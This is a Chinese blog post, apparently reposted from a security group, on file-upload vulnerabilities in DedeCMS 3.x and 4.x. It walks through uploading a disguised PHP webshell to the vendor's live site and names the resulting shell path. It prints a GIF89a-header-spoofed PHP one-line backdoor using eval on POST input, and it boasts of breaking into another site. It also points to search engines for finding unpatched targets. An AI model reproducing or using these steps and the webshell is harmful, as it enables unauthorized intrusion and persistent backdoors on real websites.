织梦内容管理系统(DEDECMS)3.X+4.X上传漏洞

鬼仔注:准确来说应该是DEDECMS中所用的php版的FCKeditor存在上传漏洞,gif89a文件头欺骗,没想到在php版的FCKeditor中竟然存在这样的漏洞,gif89a文件头欺骗不算是新鲜东西了。

信息来源:B.S.T

3.X(作者:无月):
因为本人不懂PHP所以直接黑箱搞他.现在用官方做演示
官方地址http://www.dedecms.com/
首先注册个帐号,注册完以后直接在地址栏输入
http://www.dedecms.com/include/dialoguser/select_soft.php
或者include/dialoguser/select_media.php都可以,
我就选-软件管理器- 这里可以创建目录,可是貌似过滤了"."号.
在游览一个改了后缀名的PHP马,我这里把PHP马改成RAR后缀,你用其
他都可以,只要他支持就可以了,接着在右面的改名的地方把名字改成*.PHP.然后点确定
就上传上去了.我这里的路径就在 http://www.dedecms.com/upimg/userup/556/phshell.php

4.X:
在4 .x里面用到的是php版FCKeditor的修改版…./include/FCKeditor/editor/dialog/imageuser.php下.

<td align="right" nowrap> 新图片:</td>
<td colspan="2" nowrap><input name="imgfile" type="file" id="imgfile" onChange="SeePic('picview',this);" style="height:22" class="binput">
  <input type="submit" name="picSubmit" id="picSubmit" value=" 上 传 " style="height:22" class="binput"></td>

大家可以看到在上传拖上没有对picSubmit进行任何处理。但是却不能直接上传php马。因为会识别。

这是可乐修改的的php小马。

gif89a
<?php
phpinfo();
?>
RFI
gif89a
<?php
eval($_POST[c]);
?>

利用gif89a进行了欺骗。现在上传就可以成功了.然后有php一句话客户端连接.

就这么简单。十分白痴的漏洞。上次9you分站也存在这个漏洞。我进去一次.呵呵~

用织梦系统的利用百度搜下有很多.测试了下.只针对最新版。只有少数站静止asp.php.txt文件上传。

%80都是可以的.官方未发放补丁。

相关日志

楼被抢了 2 层了... 抢座Rss 2.0或者 Trackback

发表评论